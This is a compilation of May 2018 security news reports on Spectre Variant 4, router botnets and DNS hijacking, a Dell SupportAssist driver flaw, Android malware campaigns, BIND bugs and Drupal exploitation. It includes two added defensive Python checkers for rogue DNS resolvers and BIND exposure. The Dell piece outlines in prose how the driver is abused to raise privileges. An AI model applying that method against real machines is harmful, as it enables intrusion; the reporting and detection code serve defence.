Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2), while Meltdown attacks are possible due to CVE-2017-5754 (Variant 3). Researchers at Google Project Zero and Microsoft recently identified a new method which they have dubbed Variant 4.

Variant 4 relies on a side-channel vulnerability known as Speculative Store Bypass (SSB) and it has been assigned the identifier CVE-2018-3639. Companies have also shared details on Variant 3a, a Rogue System Register Read issue tracked as CVE-2018-3640. Variant 3a was documented by ARM back in January, but it went largely unnoticed.

A German magazine reported in early May that Intel and others had been working on patches for several new Spectre flaws dubbed “Spectre-NG.” Reports claimed the new variants may be more serious and easier to exploit, but none of the impacted vendors appear too concerned about the new findings, in most cases assigning medium/moderate/important severity ratings.

Microsoft is still analyzing its products, but so far it has not identified any code in its software or cloud service infrastructure that allows exploitation of Variant 4. The company says its previous Meltdown and Spectre mitigations should address this variant as well, and noted that “Microsoft Edge, Internet Explorer, and other major browsers have taken steps to increase the difficulty of successfully creating a side channel.”

As for Variant 3a, Microsoft says “the mitigation for this vulnerability is exclusively through a microcode/firmware update, and there is no additional Microsoft Windows operating system update.”

Intel has already developed microcode patches that should address both Variant 3a and Variant 4. Beta versions have been provided to OEMs and operating system vendors, and BIOS and software updates are expected to become available in the coming weeks.

“[The mitigation for Variant 4] will be set to off-by-default, providing customers the choice of whether to enable it. We expect most industry software partners will likewise use the default-off option,” said Leslie Culbertson, executive vice president and general manager of Product Assurance and Security at Intel.

If the mitigation is enabled, there may be a negative impact on performance of roughly 2-8 percent, the chipmaker says.

AMD says it has not identified any products vulnerable to Variant 3a, and that patches for Variant 4 should be expected from Microsoft and Linux distributions.

IBM has released both operating system and firmware updates to patch Variant 4 in its Power Systems clients.

Other organizations that have published advisories and blog posts for Variant 3a and Variant 4 include Red Hat, VMware, Oracle, Cisco, Xen, Ubuntu, Suse, CERT/CC and US-CERT.

Several other side-channel attack methods have been identified since the initial disclosure of Spectre and Meltdown, including ones dubbed BranchScope, SgxPectre, and MeltdownPrime and SpectrePrime. The most recently discovered method has allowed researchers to gain access to the highly privileged System Management Mode (SMM) memory.


TheMoon botnet is now leveraging a zero-day to target GPON routers

22.5.2018 securityaffairs Vulnerability

Security experts from Qihoo 360 Netlab discovered that the operators behind the TheMoon botnet are now leveraging a zero-day exploit to target GPON routers.
Researchers from Qihoo 360 Netlab reported that cybercriminals are continuing to target Dasan GPON routers: they recently spotted threat actors using another, previously unknown flaw affecting the same routers to recruit them into their botnet.

At the time of writing, there are no further details on the vulnerability exploited in the wild; Qihoo 360 Netlab only confirmed that the exploit code they tested worked on two models of GPON routers.

The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.

The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators have added at least six IoT device exploits to the bot’s code.

“A very special thing about this round is the attacking payload. It is different from all previous ones, so it looks like a 0day.” reads the analysis published by Netlab.

“And we tested this payload on two different versions of GPON home router, all work. All these make TheMoon totally different, and we chose NOT to disclose the attack payload details.”

TheMoon isn’t the only botnet targeting Dasan GPON routers. In a previous analysis shared by Netlab, the experts confirmed that the Hajime, Mettle, Mirai, Muhstik and Satori botnets have been exploiting CVE-2018-10561 and CVE-2018-10562 against the same models.

Netlab along with other security firms have managed to take down the C&C servers of the Muhstik botnet.

Although a large number of GPON routers are exposed online, only 240,000 have been compromised, likely because the exploit code used by the attackers was not able to properly infect the devices.

Experts warn that the number of infected GPON routers could rapidly increase if the zero-day vulnerability is picked up by other threat actors.


Dell Patches Vulnerability in Pre-installed SupportAssist Utility
21.5.2018 securityweek  Vulnerability

Dell Patches Local Privilege Escalation in SupportAssist

Dell recently addressed a local privilege escalation (LPE) vulnerability in SupportAssist, a tool pre-installed on most new Dell devices running Windows.

The security issue resides in a kernel driver the tool loads, Bryan Alexander, the security researcher who discovered the issue, reveals. The Dell SupportAssist tool is mainly used to troubleshoot issues and offer support to both the user and Dell.

The vulnerability can be abused to bypass driver signature enforcement (DSE) ad infinitum, the researcher says. The driver, he explains, exposes a lot of functionality, providing “capabilities for reading and writing the model-specific register (MSR), resetting the 1394 bus, and reading/writing CMOS.”

The impacted driver is first loaded when SupportAssist is launched (filename pcdsrvc_x64.pkms or pcdsrvc.pkms, depending on architecture). Although used by Dell, the driver is built by PC-Doctor, a company that offers “system health solutions” to computer makers such as Dell, Intel, Yokogawa, IBM, and others.

“Once the driver is loaded, it exposes a symlink to the device at PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users on the system. This allows us to trigger one of the many IOCTLs exposed by the driver; approximately 30,” the researcher explains.

Alexander also found a DLL used by the userland agent that worked as an interface to the kernel driver and had symbol names available. Further analysis revealed a MemDriver class that allows userland services to read and write arbitrary physical addresses.

For that, however, the driver must be ‘unlocked’ to start processing control codes. To unlock it, one would simply need to send a system call (ioctl) containing the proper code. Next, the driver sets a global flag and “will process control codes for the lifetime of the system,” the researcher notes.

To exploit the issue, one can start reading physical memory looking for process pool tags, then identify a target process and a SYSTEM process, and then steal the token.

“However, PCD appears to give us a shortcut via getPhysicalAddress ioctl. If this does indeed return the physical address of a given virtual address (VA), we can simply find the physical of our VA and enable a couple token privileges using the writePhysicalMemory ioctl,” the researcher notes.

The issue, nevertheless, is that only usermode addresses can be resolved this way, as the MmProbeAndLockPages call is passing in UserMode for the KPROCESSOR_MODE.

Even so, one could still read chunks of physical memory, and the researcher used that to toggle on SeDebugPrivilege for the current process token (which requires “finding the token in memory and writing a few bytes at a field offset”).

Once the physical address of the token has been identified, the researcher triggered two separate writes at the Enabled and Default fields of a _TOKEN. The researcher published the source code of the bug on GitHub.

The vulnerability was reported to Dell in early April, but a patched version of SupportAssist was only released last week.


Utimaco to Acquire Atalla Hardware Security Module Business From Micro Focus
21.5.2018 securityweek  Security

Aachen, Germany-based firm Utimaco will acquire the Atalla hardware security module (HSM) and enterprise secure key manager (ESKM) lines from UK-based Micro Focus.

Announced on Friday, the financial details of the transaction were not disclosed. The deal is expected to complete by September 2018, subject to regulatory approval.

Both Utimaco and Atalla have been in the HSM business for around thirty years. Utimaco, the world's second largest supplier, has focused on general purpose HSMs sold via OEMs and the channel. Atalla has particular strengths in the financial services market, with access to top brand banking and financial services players, especially in the USA, UK and Asia.

"Both Utimaco and Atalla are pioneers in hardware security modules, the combination of which leads to an unrivalled wealth of experience and know-how," said Malte Pollmann, Utimaco’s CEO. "The acquisition of Atalla will mark a key milestone in the further implementation of our growth strategy. It is complementary in terms of product portfolio and regional footprint as well as the vertical markets we are addressing."

"As two of the leading pioneers in the hardware security modules business, Atalla and Utimaco are a perfect match, operating in complementary markets with aligned strengths that will help drive better alignment for customers and position Atalla for future growth,” said John Delk, general manager of security for Micro Focus.

Utimaco says it will maintain the existing Atalla team and further invest at Atalla's Sunnyvale, CA, location.

HSMs are specially hardened devices used to house and protect digital keys and signatures. Atalla's HSM is a payments hardware security module for protecting sensitive data and associated keys for non-cash retail payment transactions, cardholder authentication, and cryptographic keys.

The ESKM line provides a centralized key management hardware-based solution for unifying and automating an organization’s encryption key controls by creating, protecting, serving, and auditing access to encryption keys.

Micro Focus acquired Atalla after HPE CEO Meg Whitman announced, in September 2016, that it would be spun out and then merged with Micro Focus.

Utimaco was acquired by Sophos in 2009. One year later, Sophos sold a majority interest to Apax Partners, and this was followed by a management buyout in 2013. Today, Utimaco's primary investors are EQT, PINOVA Capital and BIP Investment Partners S.A.


Researcher Earns $36,000 for Google App Engine Flaws
21.5.2018 securityweek  Vulnerability

An 18-year-old researcher has earned more than $36,000 from Google after finding a critical remote code execution vulnerability related to the Google App Engine.

Part of the Google Cloud offering, the App Engine is a framework that allows users to develop and host web applications on a fully managed serverless platform.

In February, Ezequiel Pereira, a student from Uruguay, managed to gain access to a non-production Google App Engine development environment. Once he obtained access, he discovered that he could use some of Google’s internal APIs.

Pereira did not notice anything that appeared dangerous before his first report through Google’s Vulnerability Reward Program (VRP), but his findings were assigned a P1 priority rating, which indicates that the issue needs to be addressed quickly as it may impact a large percentage of users.

After looking around more, the researcher did come across some interesting methods and submitted a second report to Google. Following the second report, the tech giant escalated the issue and advised Pereira to stop his tests as he might “easily break something using these internal APIs.”

Google’s own analysis of the security holes led to the determination that they could have been exploited for remote code execution “due to the way Google works.”

Google awarded the researcher a total of $36,337 for his findings, including $5,000 for a less severe issue. The first report was sent to the company on February 25 and a patch was rolled out sometime between March 6 and March 13, Pereira said.

The expert has published a blog post detailing his findings and his interactions with Google.

This was not the first time Pereira discovered serious vulnerabilities in Google services. In the past few years, he earned thousands of dollars through the VRP.

Bug bounty hunters often push their tests to the limit due to concerns that the vendor might downplay their findings if they don’t clearly demonstrate the impact of a vulnerability. However, at least in Pereira’s case, Google does appear to have calculated bug bounty payouts based on full potential impact. In the past, the expert earned up to $10,000 for weaknesses that initially did not appear to be worth much in terms of a bug bounty.


Critical Flaws Patched in Phoenix Contact Industrial Switches
21.5.2018 securityweek  ICS

Several vulnerabilities, including ones rated critical and high severity, have been patched in industrial Ethernet switches made by Phoenix Contact, a Germany-based company that specializes in industrial automation, connectivity and interface solutions.

The vulnerabilities, described in advisories published recently by ICS-CERT and its German counterpart CERT@VDE, can be exploited remotely to cause a denial-of-service (DoS) condition, execute arbitrary code, and gain access to potentially sensitive information.

The security holes, discovered by researchers at Positive Technologies, impact Phoenix Contact FL SWITCH 3xxx, 4xxx and 48xx series devices running firmware versions 1.0 through 1.33. The flaws have been patched by the vendor with the release of version 1.34.

The most serious of the vulnerabilities, based on its CVSS score of 9.1, is CVE-2018-10730, which allows an attacker who has permission to transfer configuration files to/from the switch or permission to upgrade the firmware to execute arbitrary OS shell commands.

“CGI applications config_transfer.cgi and software_update.cgi are prone to OS command injection through targeted manipulation of their web-request headers,” CERT@VDE said in an advisory. “If the vulnerability is exploited, the attacker may create their own executable files that could further exploit the integrity of the managed FL SWITCH. For example, the attacker may deny switch network access.”

The second most serious issue, with a CVSS score of 9.0, is CVE-2018-10731. This flaw, caused by a stack-based buffer overflow, can be exploited to gain unauthorized access to the device’s OS files and inject executable code.

Another stack-based buffer overflow affecting FL SWITCH products is CVE-2018-10728, which can be exploited for DoS attacks and executing arbitrary code. An attacker can leverage this flaw to disable Web and Telnet services, CERT@VDE warned.

The last vulnerability patched by Phoenix Contact in its industrial switches is a medium severity weakness that allows an unauthenticated attacker to read the content of a device’s configuration file.

This is not the first time researchers from Positive Technologies have found vulnerabilities in switches from Phoenix Contact. In January, ICS-CERT and CERT@VDE disclosed flaws that could have been exploited to gain full control of affected devices and possibly interrupt operations in the ICS network.

Researchers said at the time that they had not found any of these switches connected directly to the Internet and noted that these devices are typically used for internal PLC networks.


Android Malware Targets North Korean Defectors
21.5.2018 securityweek  Android

Recent attacks orchestrated by a hacking group referred to as “Sun Team” have targeted North Korean defectors via malicious applications in the Google Play store, McAfee reports.

Referred to as RedDawn, this is the second campaign attributed to the group this year, but the first to abuse the legitimate Google Play storefront for malware distribution. In January, the security firm revealed that North Korean defectors and journalists were being targeted via social networks, email, and chat apps.

McAfee’s security researchers found the malware uploaded on Google Play as ‘unreleased’ versions and reports that only around 100 infections occurred via the application marketplace. Google has already removed the malicious programs.

Once installed, the malware starts copying sensitive information from the device, including personal photos, contacts, and SMS messages, and then sends them to the threat actors.

McAfee found that the hackers managed to upload three applications to Google Play – based on the email accounts and Android devices used in the previous attack. The apps include Food Ingredients Info, Fast AppLock, and AppLockFree. They stayed in Google Play for about 2 months before being removed.

Food Ingredients Info and Fast AppLock can “secretly steal device information and receive commands and additional executable (.dex) files from a cloud control server. We believe that these apps are multi-staged, with several components,” McAfee reports.

AppLockFree, on the other hand, appears to be part of the reconnaissance stage, setting the foundation for additional malware. The malicious programs would “spread to friends, asking them to install the apps and offer feedback via a Facebook account with a fake profile” that promoted Food Ingredients Info.

“After infecting a device, the malware uses Dropbox and Yandex to upload data and issue commands, including additional plug-in dex files; this is a similar tactic to earlier Sun Team attacks. From these cloud storage sites, we found information logs from the same test Android devices that Sun Team used for the malware campaign we reported in January,” McAfee reports.

The logs have a similar format and use the same abbreviations as in other logs previously associated with Sun Team. Furthermore, the hackers used already known Sun Team email addresses for the malware’s developer.

The group’s malware has been active since 2017 and has gone through multiple versions since. The hackers continue to focus on extracting information from infected devices (they only use spyware).

As in previous attacks, the new malware uses Korean words, and the Dropbox account naming follows a similar pattern of celebrity names. This suggests that the actors are not native South Koreans, but are familiar with the culture and language.

The researchers also discovered that the Android devices the attackers tested their malware on are “manufactured in several countries and carry installed Korean apps.” Exploit code found in cloud storage revealed modified “versions of publicly available sandbox escape, privilege escalation, code execution exploits” with added functions to drop custom Trojans on infected devices.

“The modified exploits suggest that the attackers are not skillful enough to find zero days and write their own exploits. However, it is likely just a matter of time before they start to exploit vulnerabilities,” the researchers note.

The Sun Team hackers were observed creating fake accounts using photos from social networks and the identities of South Koreans. In addition to stealing identities, the hackers are using texting and calling services to generate virtual phone numbers that allow them to sign up for online services in South Korea.


Attackers Change DNS Settings of DrayTek Routers
21.5.2018 securityweek  Attack

Attackers have been targeting a zero-day vulnerability in routers made by DrayTek to change their DNS settings and likely abuse them in future attacks.

The Taiwan-based manufacturer of broadband Customer Premises Equipment (CPE) has already acknowledged the problem and has issued a firmware update to address it.

According to the company, the security vulnerability impacts the web administration feature, allowing for an attacker “to intercept or create an administration session and change settings on your router.”

Checking whether a device has been hit is quite easy, as it would show a different DNS server than the one set by the user (or the default blank). The attackers are changing the DNS settings to at least one rogue server, 38[.]134[.]121[.]95, an IP located on the network of China Telecom.

The altering of DNS settings on routers is likely the initial phase of a larger attack, where users would be redirected to rogue DNS servers and fake websites. Thus, cybercriminals can harvest usernames and passwords, steal sensitive information such as banking credentials, or serve malicious applications to unsuspecting users.

“Shodan shows there are nearly 800,000 Draytek routers worldwide, so the vulnerability provides a big opportunity for malicious redirections which could result in people and businesses losing credentials, data and ultimately money,” Sion Lloyd, Researcher at Nominet, told SecurityWeek in an emailed comment.

“Given DNS is basically the underlying protocol that directs traffic around the internet, it often enjoys certain privileges on the corporate firewall. Attackers know this, which is why it is often seen as a weak spot and hijacked and abused,” Lloyd continued.

The rogue address observed on impacted DrayTek routers is not responding to DNS queries, suggesting that the attackers might not have activated the server yet, or have taken it offline. The issue might also go unnoticed on affected devices if the hackers set a secondary (legitimate) address as a fallback.

Researchers who noticed the altered DNS settings on DrayTek suggest that the attackers indeed used an exploit and didn’t abuse default login credentials. The manufacturer hasn’t provided specific details on the targeted issue, but apparently did confirm that a zero-day was being abused.

DrayTek has issued a couple of advisories to inform users on the flaw, and one of them also contains a list of all impacted router models and the updated firmware versions released for them.

The company also notes that, in addition to the router’s DNS and DHCP settings, users should also check the settings for each subnet, if the router supports multiple LAN subnets. The attackers might have also disabled the DHCP server on affected routers, which should cause errors on LAN, thus making the issue more obvious.

“Specific improvements have been identified as necessary to combat this and we are in the process of producing and issuing new firmware. You should install that as soon as possible,” DrayTek says.

Users who have been compromised are advised to restore a configuration backup or manually correct all settings. They are also advised to change the admin password, check whether other admin users have been added, and disable remote access to the router, unless it is needed.

“The best defense against this type of attack is always to make sure you have the latest firmware installed; note that similar attacks on other devices have used default passwords - so changing these is also advised. Connected hardware is constantly being picked apart by attackers, so monitoring security alerts and patching the holes they discover is crucial,” Lloyd said.

Additionally, monitoring DNS traffic can help organizations see whether requests are being redirected to rogue servers or are resolving at the intended host.

“Monitoring DNS traffic for anomalies or behavioral changes, as well as comparing it against known bad identifiers, can provide a useful way for security teams to stop this kind of attack occurring before it is a problem. There is also a mechanism to validate that a DNS response is correct, known as DNSSEC. Owners of valuable domains can use this to make it possible to spot when a DNS response has been altered, although in the case where your DNS server is compromised this may not help,” Lloyd pointed out.
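A minimal version of the DNS monitoring just described, as an added example that is not code from DrayTek, Nominet or SecurityWeek: every port-53 flow in a (constructed) flow log is checked against the resolvers the network is supposed to use and against the rogue address reported in the article. The log format, the allowlist and all sample lines are assumptions made for the example.

```python
"""Flag DNS traffic going to resolvers you did not configure.

Added example, not code from DrayTek, Nominet or SecurityWeek: a hijacked
router quietly forwards lookups to a resolver the owner never chose, so the
simplest network-side check is to compare the destination of every port-53
flow against the resolvers you expect, plus any published rogue addresses.
The log format and the allowlist below are constructed assumptions; the rogue
resolver address is the one reported in the article.
"""
import re
from collections import Counter

# Resolvers this (constructed) network is supposed to use.
ALLOWED_RESOLVERS = {"192.168.1.1", "9.9.9.9"}
# Rogue resolver seen on hijacked DrayTek routers (refanged from the article).
KNOWN_ROGUE_RESOLVERS = {"38.134.121.95"}

# Constructed flow-log shape: "<timestamp> src=<ip> dst=<ip> dport=<port> qname=<name>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)"
    r"\s+dport=(?P<dport>\d+)\s+qname=(?P<qname>\S+)$"
)

# Constructed sample lines: two normal lookups, one from the router itself to
# the reported rogue address, one to an unexpected public resolver, one
# non-DNS flow, and one junk line the parser must skip.
SAMPLE_LOG = """\
2018-05-20T09:00:01Z src=192.168.1.23 dst=192.168.1.1 dport=53 qname=mail.example.net
2018-05-20T09:00:02Z src=192.168.1.23 dst=9.9.9.9 dport=53 qname=www.example.org
2018-05-20T09:00:03Z src=192.168.1.1 dst=38.134.121.95 dport=53 qname=bank.example.com
2018-05-20T09:00:04Z src=192.168.1.40 dst=203.0.113.7 dport=53 qname=login.example.com
2018-05-20T09:00:05Z src=192.168.1.40 dst=203.0.113.7 dport=443 qname=-
this line is not a flow record
"""


def parse_line(line: str):
    """Return the record as a dict, or None for lines that are not flow records."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(record: dict) -> str:
    """'ok' for expected resolvers, 'known_rogue' for published bad addresses,
    'unexpected_resolver' for any other port-53 destination, 'not_dns' otherwise."""
    if record["dport"] != "53":
        return "not_dns"
    if record["dst"] in KNOWN_ROGUE_RESOLVERS:
        return "known_rogue"
    if record["dst"] in ALLOWED_RESOLVERS:
        return "ok"
    return "unexpected_resolver"


def scan(log_text: str) -> list:
    """Alerts as (verdict, src, dst, qname) for every DNS flow that is not 'ok'."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify(rec)
        if verdict in ("known_rogue", "unexpected_resolver"):
            alerts.append((verdict, rec["src"], rec["dst"], rec["qname"]))
    return alerts


def sources_by_verdict(alerts: list) -> dict:
    """Count alerting source addresses per verdict; the router's own LAN address
    showing up under 'known_rogue' points at altered router DNS settings."""
    counts = {}
    for verdict, src, _dst, _qname in alerts:
        counts.setdefault(verdict, Counter())[src] += 1
    return {v: dict(c) for v, c in counts.items()}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for alert in found:
        print(*alert)
    print(sources_by_verdict(found))
```

The check only sees flows that leave the network, so a router with a legitimate secondary resolver as fallback may alert only intermittently; the article's advice to inspect the router's DNS, DHCP and per-subnet settings directly still applies.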


Roaming Mantis gang evolves and broadens its operations
21.5.2018 securityaffairs   Android

The Roaming Mantis malware, which initially targeted Android devices, has now broadened both its geographic range and its targets.
Security experts from Kaspersky Lab discovered that the operators behind the Roaming Mantis campaign continue to improve their malware, broadening their targets, their geographic range and their functional scope.

Roaming Mantis surfaced in March 2018, when hacked routers in Japan were redirecting users to compromised websites. An investigation by Kaspersky Lab indicated that the attack was targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.

“Our research revealed that the malware (sic) contains Android application IDs for popular mobile banking and game applications in South Korea. The malware is most prevalent in South Korea, and Korean is the first language targeted in HTML and test.dex. Based on our findings, it appears the malicious app was originally distributed to South Korean targets. Support was then added for Traditional Chinese, English, and Japanese, broadening its target base in the Asian region.”

The DNS hijacking malware was originally designed to steal users’ login credentials and the secret code for two-factor authentication from Android devices; it has since evolved and was recently spotted targeting iOS devices as well as desktop users.

“In April 2018, Kaspersky Lab published a blog post titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis uses Android malware which is designed to spread via DNS hijacking and targets Android devices.” reads the analysis published by Kaspersky.

“In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.”

Operators behind the Roaming Mantis malware recently added support for 27 languages to broaden their operations.

New versions of the Roaming Mantis malware continue to be spread via DNS hijacking: attackers use rogue websites to serve fake apps carrying banking malware to Android users and phishing sites to iOS users, and redirect PC users to websites hosting a cryptocurrency mining script.

To evade detection, malicious websites used in the campaign generate new packages in real time.

“Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018. It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes.” continues the analysis.
“This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.”

According to Kaspersky, the recent malicious apk now implements 19 backdoor commands, including the new “ping” command as well as sendSms, setWifi, gcont, lock, onRecordAction, call and get_apps.

Owners of iOS devices are redirected to a phishing site (http://security[.]apple[.]com/) that mimics the Apple website in an attempt to steal user credentials and financial data (user ID, password, card number, card expiration date and CVV number).

The Roaming Mantis operators have recently started targeting PC platforms as well: users are redirected to websites running the Coinhive web miner script.

The level of sophistication of the operations conducted by the Roaming Mantis gang and the rapid growth of the campaign led the researchers to believe that the group has a strong financial motivation and is well-funded.

“The evasion techniques used by Roaming Mantis have also become more sophisticated. Several examples of recent additions described in this post include a new method of retrieving the C2 by using the email POP protocol, server side dynamic auto-generation of changing apk file/filenames, and the inclusion of an additional command to potentially assist in identifying research environments, have all been added.” concludes Kaspersky.
“The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.”

Further details, including IoCs, are available in the report published by Kaspersky.


Internet Systems Consortium rolled out security updates to address 2 flaws in BIND DNS Software
21.5.2018 securityaffairs Vulnerability

On Friday, the Internet Systems Consortium (ISC) announced security updates for BIND DNS software that address two vulnerabilities rated “medium” severity.
Both vulnerabilities could be exploited by attackers to cause a denial-of-service (DoS) condition; the first issue, tracked as CVE-2018-5737, can also cause other severe operational problems such as degradation of the service.

“A problem with the implementation of the new serve-stale feature in BIND 9.12 can lead to an assertion failure in rbtdb.c, even when stale-answer-enable is off. Additionally, problematic interaction between the serve-stale feature and NSEC aggressive negative caching can in some cases cause undesirable behavior from named, such as a recursion loop or excessive logging.” reads the security advisory published by the ISC.

“Deliberate exploitation of this condition could cause operational problems depending on the particular manifestation — either degradation or denial of service.”

The flaw affects BIND 9.12.0 and 9.12.1; servers that permit recursion to clients and have the max-stale-ttl parameter set to a non-zero value are at risk.

The Internet Systems Consortium (ISC) has addressed the flaw with the release of BIND 9.12.1-P2. Below is the workaround provided by the organization:

Setting “max-stale-ttl 0;” in named.conf will prevent exploitation of this vulnerability (but will effectively disable the serve-stale feature.)
Setting “stale-answer enable off;” is not sufficient to prevent exploitation, max-stale-ttl needs to be set to zero.
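To turn the workaround into a repeatable check, the following script (an added example, not part of the article or of ISC's own tooling) parses the options block of a named.conf, reads recursion, max-stale-ttl and stale-answer-enable, and reports whether a server of a given version is exposed to CVE-2018-5737 under the conditions the advisory describes. The sample configurations are constructed; the one-week default assumed for max-stale-ttl when the option is absent, and the treatment of the recalled 9.12.1-P1 build as still affected, are assumptions made for the example.

```python
import re

# Versions the ISC advisory lists as affected by CVE-2018-5737; fixed in 9.12.1-P2.
AFFECTED_BASE_VERSIONS = {"9.12.0", "9.12.1"}
FIXED_PATCH_LEVEL = 2
# Assumption: BIND 9.12 defaults max-stale-ttl to one week when the option is absent.
DEFAULT_MAX_STALE_TTL = 604800
_TTL_UNITS = {"": 1, "s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}
_TRUE_WORDS = {"yes", "true", "on"}


def strip_comments(text):
    """Remove the three comment styles named.conf accepts: /* */, // and #."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    return re.sub(r"(//|#).*", "", text)


def options_block(text):
    """Return the body of the global options { ... } block, honouring nested braces."""
    m = re.search(r"(?<![\w-])options\s*\{", text)
    if not m:
        return ""
    depth, start = 0, m.end()
    for i in range(start - 1, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[start:i]
    return text[start:]


def option_value(block, name):
    """Value of a simple 'name value;' statement; 'allow-recursion { ... };' is not matched."""
    m = re.search(r"(?<![\w-])%s\s+([^;{]+);" % re.escape(name), block)
    return m.group(1).strip().strip('"') if m else None


def ttl_seconds(value):
    """Parse a BIND TTL such as 0, 3600, 2h or 1w into seconds."""
    m = re.fullmatch(r"(\d+)([smhdw]?)", value.strip().lower())
    if not m:
        raise ValueError("unparseable TTL: %r" % value)
    return int(m.group(1)) * _TTL_UNITS[m.group(2)]


def is_affected_version(version):
    """9.12.0 and 9.12.1 are affected; assume the recalled -P1 build is too, -P2 is fixed."""
    base, _, patch = version.partition("-P")
    if base not in AFFECTED_BASE_VERSIONS:
        return False
    return not patch or int(patch) < FIXED_PATCH_LEVEL


def assess(named_conf, version):
    """Combine version, recursion and max-stale-ttl into an exposure verdict with advice."""
    block = options_block(strip_comments(named_conf))
    recursion = (option_value(block, "recursion") or "yes").lower() in _TRUE_WORDS
    raw_ttl = option_value(block, "max-stale-ttl")
    max_stale_ttl = ttl_seconds(raw_ttl) if raw_ttl is not None else DEFAULT_MAX_STALE_TTL
    stale_enable = (option_value(block, "stale-answer-enable") or "no").lower() in _TRUE_WORDS
    exposed = is_affected_version(version) and recursion and max_stale_ttl > 0
    if not exposed:
        advice = "not exposed to CVE-2018-5737 as configured"
    elif not stale_enable:
        advice = ("stale-answer-enable is off but max-stale-ttl is non-zero: per the advisory "
                  "that is not sufficient; set max-stale-ttl 0; or upgrade to 9.12.1-P2")
    else:
        advice = "set max-stale-ttl 0; (disables serve-stale) or upgrade to 9.12.1-P2"
    return {"version_affected": is_affected_version(version), "recursion": recursion,
            "max_stale_ttl": max_stale_ttl, "stale_answer_enable": stale_enable,
            "exposed": exposed, "advice": advice}


# Constructed sample configurations (not real deployments).
VULNERABLE_CONF = """
options {
    directory "/var/cache/bind";
    recursion yes;
    allow-recursion { 10.0.0.0/8; };
    stale-answer-enable no;   // disabling stale answers alone does not help
    max-stale-ttl 1w;
};
"""
MITIGATED_CONF = VULNERABLE_CONF.replace("max-stale-ttl 1w;", "max-stale-ttl 0;")
AUTHORITATIVE_CONF = VULNERABLE_CONF.replace("recursion yes;", "recursion no;")

if __name__ == "__main__":
    for label, conf, ver in (("recursive 9.12.1", VULNERABLE_CONF, "9.12.1"),
                             ("mitigated 9.12.1", MITIGATED_CONF, "9.12.1"),
                             ("recursive 9.12.1-P2", VULNERABLE_CONF, "9.12.1-P2"),
                             ("authoritative 9.12.0", AUTHORITATIVE_CONF, "9.12.0")):
        print(label, "->", assess(conf, ver)["advice"])
```

The first sample deliberately has stale-answer-enable turned off and still comes back as exposed, which is the point the advisory makes: only max-stale-ttl 0 (or the patched release) removes the condition, and the check treats a missing max-stale-ttl as the non-zero default rather than as safe.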
The second flaw, tracked as CVE-2018-5736, is remotely exploitable only if the attacker can trigger a zone transfer.

“An error in zone database reference counting can lead to an assertion failure if a server which is running an affected version of BIND attempts several transfers of a slave zone in quick succession,” states the advisory published by the ISC.

“This defect could be deliberately exercised by an attacker who is permitted to cause a vulnerable server to initiate zone transfers (for example: by sending valid NOTIFY messages), causing the named process to exit after failing the assertion test.”

The CVE-2018-5736 flaw affects BIND 9.12.0 and 9.12.1; the ISC addressed it with the release of version 9.12.1-P1. However, admins need to update to version 9.12.1-P2, because version 9.12.1-P1 was affected by a defect.

This is the third time that the ISC has provided security updates for BIND software this year. The first updates were released in January to address a high severity vulnerability that could cause DNS servers to crash.

The second updates were released in February to address remotely exploitable vulnerabilities in DHCP.


Hacked Drupal sites involved in mining campaigns, RATs distributions, scams
21.5.2018 securityaffairs Virus

Crooks are exploiting known vulnerabilities in the popular Drupal CMS such as Drupalgeddon2 and Drupalgeddon3 to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.
Security experts at Malwarebytes reported that compromised Drupal websites are used to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

The two remote code execution vulnerabilities, tracked as CVE-2018-7600 and CVE-2018-7602, have already been fixed by Drupal developers.

At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by Drupal developer Jasper Mattsson.

Both Drupal 8.3.x and 8.4.x are no longer supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates; experts called it Drupalgeddon2.

The development team released the security update in time to address CVE-2018-7600.

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes,” experts started observing bad actors attempting to exploit the flaw.

A week after the release of the security update, the experts at security firm Check Point, along with Drupal experts at Dofinity, analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.

After the publication of the report, the researcher Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

Other security firms observed that threat actors had started exploiting the flaw to install malware on the vulnerable websites, mainly cryptocurrency miners.

The experts at the SANS Internet Storm Center reported several attacks delivering a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl.

At the end of April, the Drupal team fixed a new highly critical remote code execution issue (dubbed Drupalgeddon 3) tracked as CVE-2018-7602 with the release of versions 7.59, 8.4.8 and 8.5.3.

In this case too, cybercriminals started exploiting CVE-2018-7602 to hijack servers and install cryptocurrency miners.

